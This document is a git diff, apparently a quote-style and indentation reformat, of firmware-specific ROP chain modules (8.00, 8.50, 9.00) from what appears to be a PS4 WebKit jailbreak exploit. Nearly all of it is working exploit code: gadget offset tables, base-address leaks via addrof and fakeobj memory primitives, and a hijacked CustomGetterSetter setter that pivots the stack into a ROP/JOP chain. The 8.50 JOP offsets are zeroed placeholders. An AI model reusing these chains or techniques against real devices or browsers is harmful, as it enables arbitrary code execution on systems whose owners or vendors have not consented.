-import { BufferView } from '../../module/rw.mjs';
+import { mem } from "../../module/mem.mjs";
+import { KB } from "../../module/offset.mjs";
+import { ChainBase, get_gadget } from "../../module/chain.mjs";
+import { BufferView } from "../../module/rw.mjs";
-import {
- get_view_vector,
- resolve_import,
- init_syscall_array,
-} from '../../module/memtools.mjs';
+import { get_view_vector, resolve_import, init_syscall_array } from "../../module/memtools.mjs";
-import * as off from '../../module/offset.mjs';
+import * as off from "../../module/offset.mjs";
// WebKit offsets of imported functions
const offset_wk_stack_chk_fail = 0x8d8;
@@ -68,7 +64,7 @@ push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
-const jop5 = 'pop rsp; ret';
+const jop5 = "pop rsp; ret";
// the ps4 firmware is compiled to use rbp as a frame pointer
//
@@ -83,179 +79,186 @@ const jop5 = 'pop rsp; ret';
// mov rsp, rbp
// pop rbp
-const webkit_gadget_offsets = new Map(Object.entries({
- 'pop rax; ret' : 0x0000000000035a1b, // `58 c3`
- 'pop rbx; ret' : 0x000000000001537c, // `5b c3`
- 'pop rcx; ret' : 0x0000000000025ecb, // `59 c3`
- 'pop rdx; ret' : 0x0000000000060f52, // `5a c3`
+const webkit_gadget_offsets = new Map(
+ Object.entries({
+ "pop rax; ret": 0x0000000000035a1b, // `58 c3`
+ "pop rbx; ret": 0x000000000001537c, // `5b c3`
+ "pop rcx; ret": 0x0000000000025ecb, // `59 c3`
+ "pop rdx; ret": 0x0000000000060f52, // `5a c3`
- 'pop rbp; ret' : 0x00000000000000b6, // `5d c3`
- 'pop rsi; ret' : 0x000000000003bd77, // `5e c3`
- 'pop rdi; ret' : 0x00000000001e3f87, // `5f c3`
- 'pop rsp; ret' : 0x00000000000bf669, // `5c c3`
+ "pop rbp; ret": 0x00000000000000b6, // `5d c3`
+ "pop rsi; ret": 0x000000000003bd77, // `5e c3`
+ "pop rdi; ret": 0x00000000001e3f87, // `5f c3`
+ "pop rsp; ret": 0x00000000000bf669, // `5c c3`
- 'pop r8; ret' : 0x00000000005ee860, // `41 58 c3`
- 'pop r9; ret' : 0x00000000006f501f, // `47 59 c3`
- 'pop r10; ret' : 0x0000000000060f51, // `47 5a c3`
- 'pop r11; ret' : 0x00000000013cad93, // `41 5b c3`
+ "pop r8; ret": 0x00000000005ee860, // `41 58 c3`
+ "pop r9; ret": 0x00000000006f501f, // `47 59 c3`
+ "pop r10; ret": 0x0000000000060f51, // `47 5a c3`
+ "pop r11; ret": 0x00000000013cad93, // `41 5b c3`
- 'pop r12; ret' : 0x0000000000d8968d, // `41 5c c3`
- 'pop r13; ret' : 0x00000000019a0edb, // `41 5d c3`
- 'pop r14; ret' : 0x000000000003bd76, // `41 5e c3`
- 'pop r15; ret' : 0x00000000002499df, // `41 5f c3`
+ "pop r12; ret": 0x0000000000d8968d, // `41 5c c3`
+ "pop r13; ret": 0x00000000019a0edb, // `41 5d c3`
+ "pop r14; ret": 0x000000000003bd76, // `41 5e c3`
+ "pop r15; ret": 0x00000000002499df, // `41 5f c3`
- 'ret' : 0x0000000000000032, // `c3`
- 'leave; ret' : 0x0000000000291fd7, // `c9 c3`
+ "ret": 0x0000000000000032, // `c3`
+ "leave; ret": 0x0000000000291fd7, // `c9 c3`
- 'mov rax, qword ptr [rax]; ret' : 0x000000000002dc62, // `48 8b 00 c3`
- 'mov qword ptr [rdi], rax; ret' : 0x000000000005b1bb, // `48 89 07 c3`
- 'mov dword ptr [rdi], eax; ret' : 0x000000000001f864, // `89 07 c3`
- 'mov dword ptr [rax], esi; ret' : 0x00000000002915bc, // `89 30 c3`
+ "mov rax, qword ptr [rax]; ret": 0x000000000002dc62, // `48 8b 00 c3`
+ "mov qword ptr [rdi], rax; ret": 0x000000000005b1bb, // `48 89 07 c3`
+ "mov dword ptr [rdi], eax; ret": 0x000000000001f864, // `89 07 c3`
+ "mov dword ptr [rax], esi; ret": 0x00000000002915bc, // `89 30 c3`
- [jop1] : 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70`
- [jop2] : 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30`
- [jop3] : 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
- [jop4] : 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20`
- [jop5] : 0x00000000000bf669, // `5c c3`
-}));
+ [jop1]: 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70`
+ [jop2]: 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30`
+ [jop3]: 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
+ [jop4]: 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20`
+ [jop5]: 0x00000000000bf669, // `5c c3`
+ }),
+);
-const libc_gadget_offsets = new Map(Object.entries({
- 'getcontext' : 0x258f4,
- 'setcontext' : 0x29c58,
-}));
+const libc_gadget_offsets = new Map(
+ Object.entries({
+ "getcontext": 0x258f4,
+ "setcontext": 0x29c58,
+ }),
+);
-const libkernel_gadget_offsets = new Map(Object.entries({
+const libkernel_gadget_offsets = new Map(
+ Object.entries({
// returns the location of errno
- '__error' : 0x160c0,
-}));
+ "__error": 0x160c0,
+ }),
+);
export const gadgets = new Map();
function get_bases() {
- const textarea = document.createElement('textarea');
- const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
- const textarea_vtable = webcore_textarea.readp(0);
- const off_ta_vt = 0x236d4a0;
- const libwebkit_base = textarea_vtable.sub(off_ta_vt);
+ const textarea = document.createElement("textarea");
+ const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
+ const textarea_vtable = webcore_textarea.readp(0);
+ const off_ta_vt = 0x236d4a0;
+ const libwebkit_base = textarea_vtable.sub(off_ta_vt);
- const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
- const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
- const off_scf = 0x12a30;
- const libkernel_base = stack_chk_fail_addr.sub(off_scf);
+ const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
+ const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
+ const off_scf = 0x12a30;
+ const libkernel_base = stack_chk_fail_addr.sub(off_scf);
- const strlen_import = libwebkit_base.add(offset_wk_strlen);
- const strlen_addr = resolve_import(strlen_import);
- const off_strlen = 0x4eb80;
- const libc_base = strlen_addr.sub(off_strlen);
+ const strlen_import = libwebkit_base.add(offset_wk_strlen);
+ const strlen_addr = resolve_import(strlen_import);
+ const off_strlen = 0x4eb80;
+ const libc_base = strlen_addr.sub(off_strlen);
- return [
- libwebkit_base,
- libkernel_base,
- libc_base,
- ];
+ return [libwebkit_base, libkernel_base, libc_base];
}
export function init_gadget_map(gadget_map, offset_map, base_addr) {
- for (const [insn, offset] of offset_map) {
- gadget_map.set(insn, base_addr.add(offset));
- }
+ for (const [insn, offset] of offset_map) {
+ gadget_map.set(insn, base_addr.add(offset));
+ }
}
class Chain800Base extends ChainBase {
- push_end() {
- this.push_gadget('leave; ret');
- }
+ push_end() {
+ this.push_gadget("leave; ret");
+ }
- push_get_retval() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.retval_addr);
- this.push_gadget('mov qword ptr [rdi], rax; ret');
- }
+ push_get_retval() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.retval_addr);
+ this.push_gadget("mov qword ptr [rdi], rax; ret");
+ }
- push_get_errno() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.errno_addr);
+ push_get_errno() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.errno_addr);
- this.push_call(this.get_gadget('__error'));
+ this.push_call(this.get_gadget("__error"));
- this.push_gadget('mov rax, qword ptr [rax]; ret');
- this.push_gadget('mov dword ptr [rdi], eax; ret');
- }
+ this.push_gadget("mov rax, qword ptr [rax]; ret");
+ this.push_gadget("mov dword ptr [rdi], eax; ret");
+ }
- push_clear_errno() {
- this.push_call(this.get_gadget('__error'));
- this.push_gadget('pop rsi; ret');
- this.push_value(0);
- this.push_gadget('mov dword ptr [rax], esi; ret');
- }
+ push_clear_errno() {
+ this.push_call(this.get_gadget("__error"));
+ this.push_gadget("pop rsi; ret");
+ this.push_value(0);
+ this.push_gadget("mov dword ptr [rax], esi; ret");
+ }
}
export class Chain800 extends Chain800Base {
- constructor() {
- super();
- const [rdx, rdx_bak] = mem.gc_alloc(0x58);
- rdx.write64(off.js_cell, this._empty_cell);
- rdx.write64(0x50, this.stack_addr);
- this._rsp = mem.fakeobj(rdx);
- }
+ constructor() {
+ super();
+ const [rdx, rdx_bak] = mem.gc_alloc(0x58);
+ rdx.write64(off.js_cell, this._empty_cell);
+ rdx.write64(0x50, this.stack_addr);
+ this._rsp = mem.fakeobj(rdx);
+ }
- run() {
- this.check_allow_run();
- this._rop.launch = this._rsp;
- this.dirty();
- }
+ run() {
+ this.check_allow_run();
+ this._rop.launch = this._rsp;
+ this.dirty();
+ }
}
export const Chain = Chain800;
export function init(Chain) {
- const syscall_array = [];
- [libwebkit_base, libkernel_base, libc_base] = get_bases();
+ const syscall_array = [];
+ [libwebkit_base, libkernel_base, libc_base] = get_bases();
- init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
- init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
- init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
- init_syscall_array(syscall_array, libkernel_base, 300 * KB);
+ init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
+ init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+ init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
+ init_syscall_array(syscall_array, libkernel_base, 300 * KB);
- let gs = Object.getOwnPropertyDescriptor(window, 'location').set;
- // JSCustomGetterSetter.m_getterSetter
- gs = mem.addrof(gs).readp(0x28);
+ let gs = Object.getOwnPropertyDescriptor(window, "location").set;
+ // JSCustomGetterSetter.m_getterSetter
+ gs = mem.addrof(gs).readp(0x28);
- // sizeof JSC::CustomGetterSetter
- const size_cgs = 0x18;
- const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
- mem.cpy(gc_buf, gs, size_cgs);
- // JSC::CustomGetterSetter.m_setter
- gc_buf.write64(0x10, get_gadget(gadgets, jop1));
+ // sizeof JSC::CustomGetterSetter
+ const size_cgs = 0x18;
+ const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
+ mem.cpy(gc_buf, gs, size_cgs);
+ // JSC::CustomGetterSetter.m_setter
+ gc_buf.write64(0x10, get_gadget(gadgets, jop1));
- const proto = Chain.prototype;
- // _rop must have a descriptor initially in order for the structure to pass
- // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
- // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
- // checks for any descriptor to run
- //
- // the butterfly's indexing type must be something the GC won't inspect
- // like DoubleShape. it will be used to store the JOP table's pointer
- const _rop = {get launch() {throw Error('never call')}, 0: 1.1};
- // replace .launch with the actual custom getter/setter
- mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
- proto._rop = _rop;
+ const proto = Chain.prototype;
+ // _rop must have a descriptor initially in order for the structure to pass
+ // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
+ // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
+ // checks for any descriptor to run
+ //
+ // the butterfly's indexing type must be something the GC won't inspect
+ // like DoubleShape. it will be used to store the JOP table's pointer
+ const _rop = {
+ get launch() {
+ throw Error("never call");
+ },
+ 0: 1.1,
+ };
+ // replace .launch with the actual custom getter/setter
+ mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
+ proto._rop = _rop;
- // JOP table
- const rax_ptrs = new BufferView(0x100);
- const rax_ptrs_p = get_view_vector(rax_ptrs);
- proto._rax_ptrs = rax_ptrs;
+ // JOP table
+ const rax_ptrs = new BufferView(0x100);
+ const rax_ptrs_p = get_view_vector(rax_ptrs);
+ proto._rax_ptrs = rax_ptrs;
- rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
- rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
- rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
- rax_ptrs.write64(0, get_gadget(gadgets, jop5));
+ rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
+ rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
+ rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
+ rax_ptrs.write64(0, get_gadget(gadgets, jop5));
- const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
- jop_buffer_p.write64(0, rax_ptrs_p);
+ const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
+ jop_buffer_p.write64(0, rax_ptrs_p);
- const empty = {};
- proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
+ const empty = {};
+ proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
- Chain.init_class(gadgets, syscall_array);
+ Chain.init_class(gadgets, syscall_array);
}
diff --git a/src/rop/ps4/850.mjs b/src/rop/ps4/850.mjs
index af8ad3f..e03617b 100644
--- a/src/rop/ps4/850.mjs
+++ b/src/rop/ps4/850.mjs
@@ -17,18 +17,14 @@ along with this program. If not, see . */
// 8.50, 8.52
-import { mem } from '../../module/mem.mjs';
-import { KB } from '../../module/offset.mjs';
-import { ChainBase, get_gadget } from '../../module/chain.mjs';
-import { BufferView } from '../../module/rw.mjs';
+import { mem } from "../../module/mem.mjs";
+import { KB } from "../../module/offset.mjs";
+import { ChainBase, get_gadget } from "../../module/chain.mjs";
+import { BufferView } from "../../module/rw.mjs";
-import {
- get_view_vector,
- resolve_import,
- init_syscall_array,
-} from '../../module/memtools.mjs';
+import { get_view_vector, resolve_import, init_syscall_array } from "../../module/memtools.mjs";
-import * as off from '../../module/offset.mjs';
+import * as off from "../../module/offset.mjs";
// WebKit offsets of imported functions
const offset_wk_stack_chk_fail = 0x8d8;
@@ -68,7 +64,7 @@ push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
-const jop5 = 'pop rsp; ret';
+const jop5 = "pop rsp; ret";
// the ps4 firmware is compiled to use rbp as a frame pointer
//
@@ -83,179 +79,186 @@ const jop5 = 'pop rsp; ret';
// mov rsp, rbp
// pop rbp
-const webkit_gadget_offsets = new Map(Object.entries({
- 'pop rax; ret' : 0x000000000001ac7b, // `58 c3`
- 'pop rbx; ret' : 0x000000000000c46d, // `5b c3`
- 'pop rcx; ret' : 0x000000000001ac5f, // `59 c3`
- 'pop rdx; ret' : 0x0000000000282ea2, // `5a c3`
+const webkit_gadget_offsets = new Map(
+ Object.entries({
+ "pop rax; ret": 0x000000000001ac7b, // `58 c3`
+ "pop rbx; ret": 0x000000000000c46d, // `5b c3`
+ "pop rcx; ret": 0x000000000001ac5f, // `59 c3`
+ "pop rdx; ret": 0x0000000000282ea2, // `5a c3`
- 'pop rbp; ret' : 0x00000000000000b6, // `5d c3`
- 'pop rsi; ret' : 0x0000000000050878, // `5e c3`
- 'pop rdi; ret' : 0x0000000000091afa, // `5f c3`
- 'pop rsp; ret' : 0x0000000000073c2b, // `5c c3`
+ "pop rbp; ret": 0x00000000000000b6, // `5d c3`
+ "pop rsi; ret": 0x0000000000050878, // `5e c3`
+ "pop rdi; ret": 0x0000000000091afa, // `5f c3`
+ "pop rsp; ret": 0x0000000000073c2b, // `5c c3`
- 'pop r8; ret' : 0x000000000003b4b3, // `47 58 c3`
- 'pop r9; ret' : 0x00000000010f372f, // `47 59 c3`
- 'pop r10; ret' : 0x0000000000b1a721, // `47 5a c3`
- 'pop r11; ret' : 0x0000000000eaba69, // `4f 5b c3`
+ "pop r8; ret": 0x000000000003b4b3, // `47 58 c3`
+ "pop r9; ret": 0x00000000010f372f, // `47 59 c3`
+ "pop r10; ret": 0x0000000000b1a721, // `47 5a c3`
+ "pop r11; ret": 0x0000000000eaba69, // `4f 5b c3`
- 'pop r12; ret' : 0x0000000000eaf80d, // `47 5c c3`
- 'pop r13; ret' : 0x00000000019a0d8b, // `41 5d c3`
- 'pop r14; ret' : 0x0000000000050877, // `41 5e c3`
- 'pop r15; ret' : 0x00000000007e2efd, // `47 5f c3`
+ "pop r12; ret": 0x0000000000eaf80d, // `47 5c c3`
+ "pop r13; ret": 0x00000000019a0d8b, // `41 5d c3`
+ "pop r14; ret": 0x0000000000050877, // `41 5e c3`
+ "pop r15; ret": 0x00000000007e2efd, // `47 5f c3`
- 'ret' : 0x0000000000000032, // `c3`
- 'leave; ret' : 0x000000000001ba53, // `c9 c3`
+ "ret": 0x0000000000000032, // `c3`
+ "leave; ret": 0x000000000001ba53, // `c9 c3`
- 'mov rax, qword ptr [rax]; ret' : 0x000000000003734c, // `48 8b 00 c3`
- 'mov qword ptr [rdi], rax; ret' : 0x000000000001433b, // `48 89 07 c3`
- 'mov dword ptr [rdi], eax; ret' : 0x0000000000008e7f, // `89 07 c3`
- 'mov dword ptr [rax], esi; ret' : 0x0000000000cf6c22, // `89 30 c3`
+ "mov rax, qword ptr [rax]; ret": 0x000000000003734c, // `48 8b 00 c3`
+ "mov qword ptr [rdi], rax; ret": 0x000000000001433b, // `48 89 07 c3`
+ "mov dword ptr [rdi], eax; ret": 0x0000000000008e7f, // `89 07 c3`
+ "mov dword ptr [rax], esi; ret": 0x0000000000cf6c22, // `89 30 c3`
- [jop1] : 0x0000000000000000, // ``
- [jop2] : 0x0000000000000000, // ``
- [jop3] : 0x0000000000000000, // ``
- [jop4] : 0x0000000000000000, // ``
- [jop5] : 0x0000000000000000, // ``
-}));
+ [jop1]: 0x0000000000000000, // ``
+ [jop2]: 0x0000000000000000, // ``
+ [jop3]: 0x0000000000000000, // ``
+ [jop4]: 0x0000000000000000, // ``
+ [jop5]: 0x0000000000000000, // ``
+ }),
+);
-const libc_gadget_offsets = new Map(Object.entries({
- 'getcontext' : 0x25904,
- 'setcontext' : 0x29c38,
-}));
+const libc_gadget_offsets = new Map(
+ Object.entries({
+ "getcontext": 0x25904,
+ "setcontext": 0x29c38,
+ }),
+);
-const libkernel_gadget_offsets = new Map(Object.entries({
+const libkernel_gadget_offsets = new Map(
+ Object.entries({
// returns the location of errno
- '__error' : 0x10750,
-}));
+ "__error": 0x10750,
+ }),
+);
export const gadgets = new Map();
function get_bases() {
- const textarea = document.createElement('textarea');
- const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
- const textarea_vtable = webcore_textarea.readp(0);
- const off_ta_vt = 0x236d4a0;
- const libwebkit_base = textarea_vtable.sub(off_ta_vt);
+ const textarea = document.createElement("textarea");
+ const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
+ const textarea_vtable = webcore_textarea.readp(0);
+ const off_ta_vt = 0x236d4a0;
+ const libwebkit_base = textarea_vtable.sub(off_ta_vt);
- const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
- const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
- const off_scf = 0x153c0;
- const libkernel_base = stack_chk_fail_addr.sub(off_scf);
+ const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
+ const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
+ const off_scf = 0x153c0;
+ const libkernel_base = stack_chk_fail_addr.sub(off_scf);
- const strlen_import = libwebkit_base.add(offset_wk_strlen);
- const strlen_addr = resolve_import(strlen_import);
- const off_strlen = 0x4ef40;
- const libc_base = strlen_addr.sub(off_strlen);
+ const strlen_import = libwebkit_base.add(offset_wk_strlen);
+ const strlen_addr = resolve_import(strlen_import);
+ const off_strlen = 0x4ef40;
+ const libc_base = strlen_addr.sub(off_strlen);
- return [
- libwebkit_base,
- libkernel_base,
- libc_base,
- ];
+ return [libwebkit_base, libkernel_base, libc_base];
}
export function init_gadget_map(gadget_map, offset_map, base_addr) {
- for (const [insn, offset] of offset_map) {
- gadget_map.set(insn, base_addr.add(offset));
- }
+ for (const [insn, offset] of offset_map) {
+ gadget_map.set(insn, base_addr.add(offset));
+ }
}
class Chain850Base extends ChainBase {
- push_end() {
- this.push_gadget('leave; ret');
- }
+ push_end() {
+ this.push_gadget("leave; ret");
+ }
- push_get_retval() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.retval_addr);
- this.push_gadget('mov qword ptr [rdi], rax; ret');
- }
+ push_get_retval() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.retval_addr);
+ this.push_gadget("mov qword ptr [rdi], rax; ret");
+ }
- push_get_errno() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.errno_addr);
+ push_get_errno() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.errno_addr);
- this.push_call(this.get_gadget('__error'));
+ this.push_call(this.get_gadget("__error"));
- this.push_gadget('mov rax, qword ptr [rax]; ret');
- this.push_gadget('mov dword ptr [rdi], eax; ret');
- }
+ this.push_gadget("mov rax, qword ptr [rax]; ret");
+ this.push_gadget("mov dword ptr [rdi], eax; ret");
+ }
- push_clear_errno() {
- this.push_call(this.get_gadget('__error'));
- this.push_gadget('pop rsi; ret');
- this.push_value(0);
- this.push_gadget('mov dword ptr [rax], esi; ret');
- }
+ push_clear_errno() {
+ this.push_call(this.get_gadget("__error"));
+ this.push_gadget("pop rsi; ret");
+ this.push_value(0);
+ this.push_gadget("mov dword ptr [rax], esi; ret");
+ }
}
export class Chain850 extends Chain850Base {
- constructor() {
- super();
- const [rdx, rdx_bak] = mem.gc_alloc(0x58);
- rdx.write64(off.js_cell, this._empty_cell);
- rdx.write64(0x50, this.stack_addr);
- this._rsp = mem.fakeobj(rdx);
- }
+ constructor() {
+ super();
+ const [rdx, rdx_bak] = mem.gc_alloc(0x58);
+ rdx.write64(off.js_cell, this._empty_cell);
+ rdx.write64(0x50, this.stack_addr);
+ this._rsp = mem.fakeobj(rdx);
+ }
- run() {
- this.check_allow_run();
- this._rop.launch = this._rsp;
- this.dirty();
- }
+ run() {
+ this.check_allow_run();
+ this._rop.launch = this._rsp;
+ this.dirty();
+ }
}
export const Chain = Chain850;
export function init(Chain) {
- const syscall_array = [];
- [libwebkit_base, libkernel_base, libc_base] = get_bases();
+ const syscall_array = [];
+ [libwebkit_base, libkernel_base, libc_base] = get_bases();
- init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
- init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
- init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
- init_syscall_array(syscall_array, libkernel_base, 300 * KB);
+ init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
+ init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+ init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
+ init_syscall_array(syscall_array, libkernel_base, 300 * KB);
- let gs = Object.getOwnPropertyDescriptor(window, 'location').set;
- // JSCustomGetterSetter.m_getterSetter
- gs = mem.addrof(gs).readp(0x28);
+ let gs = Object.getOwnPropertyDescriptor(window, "location").set;
+ // JSCustomGetterSetter.m_getterSetter
+ gs = mem.addrof(gs).readp(0x28);
- // sizeof JSC::CustomGetterSetter
- const size_cgs = 0x18;
- const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
- mem.cpy(gc_buf, gs, size_cgs);
- // JSC::CustomGetterSetter.m_setter
- gc_buf.write64(0x10, get_gadget(gadgets, jop1));
+ // sizeof JSC::CustomGetterSetter
+ const size_cgs = 0x18;
+ const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
+ mem.cpy(gc_buf, gs, size_cgs);
+ // JSC::CustomGetterSetter.m_setter
+ gc_buf.write64(0x10, get_gadget(gadgets, jop1));
- const proto = Chain.prototype;
- // _rop must have a descriptor initially in order for the structure to pass
- // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
- // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
- // checks for any descriptor to run
- //
- // the butterfly's indexing type must be something the GC won't inspect
- // like DoubleShape. it will be used to store the JOP table's pointer
- const _rop = {get launch() {throw Error('never call')}, 0: 1.1};
- // replace .launch with the actual custom getter/setter
- mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
- proto._rop = _rop;
+ const proto = Chain.prototype;
+ // _rop must have a descriptor initially in order for the structure to pass
+ // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
+ // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
+ // checks for any descriptor to run
+ //
+ // the butterfly's indexing type must be something the GC won't inspect
+ // like DoubleShape. it will be used to store the JOP table's pointer
+ const _rop = {
+ get launch() {
+ throw Error("never call");
+ },
+ 0: 1.1,
+ };
+ // replace .launch with the actual custom getter/setter
+ mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
+ proto._rop = _rop;
- // JOP table
- const rax_ptrs = new BufferView(0x100);
- const rax_ptrs_p = get_view_vector(rax_ptrs);
- proto._rax_ptrs = rax_ptrs;
+ // JOP table
+ const rax_ptrs = new BufferView(0x100);
+ const rax_ptrs_p = get_view_vector(rax_ptrs);
+ proto._rax_ptrs = rax_ptrs;
- rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
- rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
- rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
- rax_ptrs.write64(0, get_gadget(gadgets, jop5));
+ rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
+ rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
+ rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
+ rax_ptrs.write64(0, get_gadget(gadgets, jop5));
- const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
- jop_buffer_p.write64(0, rax_ptrs_p);
+ const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
+ jop_buffer_p.write64(0, rax_ptrs_p);
- const empty = {};
- proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
+ const empty = {};
+ proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
- Chain.init_class(gadgets, syscall_array);
+ Chain.init_class(gadgets, syscall_array);
}
diff --git a/src/rop/ps4/900.mjs b/src/rop/ps4/900.mjs
index 0c2b7f3..a2aedff 100644
--- a/src/rop/ps4/900.mjs
+++ b/src/rop/ps4/900.mjs
@@ -17,18 +17,14 @@ along with this program. If not, see . */
// 9.00, 9.03, 9.04
-import { mem } from '../../module/mem.mjs';
-import { KB } from '../../module/offset.mjs';
-import { ChainBase, get_gadget } from '../../module/chain.mjs';
-import { BufferView } from '../../module/rw.mjs';
+import { mem } from "../../module/mem.mjs";
+import { KB } from "../../module/offset.mjs";
+import { ChainBase, get_gadget } from "../../module/chain.mjs";
+import { BufferView } from "../../module/rw.mjs";
-import {
- get_view_vector,
- resolve_import,
- init_syscall_array,
-} from '../../module/memtools.mjs';
+import { get_view_vector, resolve_import, init_syscall_array } from "../../module/memtools.mjs";
-import * as off from '../../module/offset.mjs';
+import * as off from "../../module/offset.mjs";
// WebKit offsets of imported functions
const offset_wk_stack_chk_fail = 0x178;
@@ -68,7 +64,7 @@ push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
-const jop5 = 'pop rsp; ret';
+const jop5 = "pop rsp; ret";
// the ps4 firmware is compiled to use rbp as a frame pointer
//
@@ -83,179 +79,186 @@ const jop5 = 'pop rsp; ret';
// mov rsp, rbp
// pop rbp
-const webkit_gadget_offsets = new Map(Object.entries({
- 'pop rax; ret' : 0x0000000000051a12, // `58 c3`
- 'pop rbx; ret' : 0x00000000000be5d0, // `5b c3`
- 'pop rcx; ret' : 0x00000000000657b7, // `59 c3`
- 'pop rdx; ret' : 0x000000000000986c, // `5a c3`
+const webkit_gadget_offsets = new Map(
+ Object.entries({
+ "pop rax; ret": 0x0000000000051a12, // `58 c3`
+ "pop rbx; ret": 0x00000000000be5d0, // `5b c3`
+ "pop rcx; ret": 0x00000000000657b7, // `59 c3`
+ "pop rdx; ret": 0x000000000000986c, // `5a c3`
- 'pop rbp; ret' : 0x00000000000000b6, // `5d c3`
- 'pop rsi; ret' : 0x000000000001f4d6, // `5e c3`
- 'pop rdi; ret' : 0x0000000000319690, // `5f c3`
- 'pop rsp; ret' : 0x000000000004e293, // `5c c3`
+ "pop rbp; ret": 0x00000000000000b6, // `5d c3`
+ "pop rsi; ret": 0x000000000001f4d6, // `5e c3`
+ "pop rdi; ret": 0x0000000000319690, // `5f c3`
+ "pop rsp; ret": 0x000000000004e293, // `5c c3`
- 'pop r8; ret' : 0x00000000001a7ef1, // `47 58 c3`
- 'pop r9; ret' : 0x0000000000422571, // `47 59 c3`
- 'pop r10; ret' : 0x0000000000e9e1d1, // `47 5a c3`
- 'pop r11; ret' : 0x00000000012b1d51, // `47 5b c3`
+ "pop r8; ret": 0x00000000001a7ef1, // `47 58 c3`
+ "pop r9; ret": 0x0000000000422571, // `47 59 c3`
+ "pop r10; ret": 0x0000000000e9e1d1, // `47 5a c3`
+ "pop r11; ret": 0x00000000012b1d51, // `47 5b c3`
- 'pop r12; ret' : 0x000000000085ec71, // `47 5c c3`
- 'pop r13; ret' : 0x00000000001da461, // `47 5d c3`
- 'pop r14; ret' : 0x0000000000685d73, // `47 5e c3`
- 'pop r15; ret' : 0x00000000006ab3aa, // `47 5f c3`
+ "pop r12; ret": 0x000000000085ec71, // `47 5c c3`
+ "pop r13; ret": 0x00000000001da461, // `47 5d c3`
+ "pop r14; ret": 0x0000000000685d73, // `47 5e c3`
+ "pop r15; ret": 0x00000000006ab3aa, // `47 5f c3`
- 'ret' : 0x0000000000000032, // `c3`
- 'leave; ret' : 0x000000000008db5b, // `c9 c3`
+ "ret": 0x0000000000000032, // `c3`
+ "leave; ret": 0x000000000008db5b, // `c9 c3`
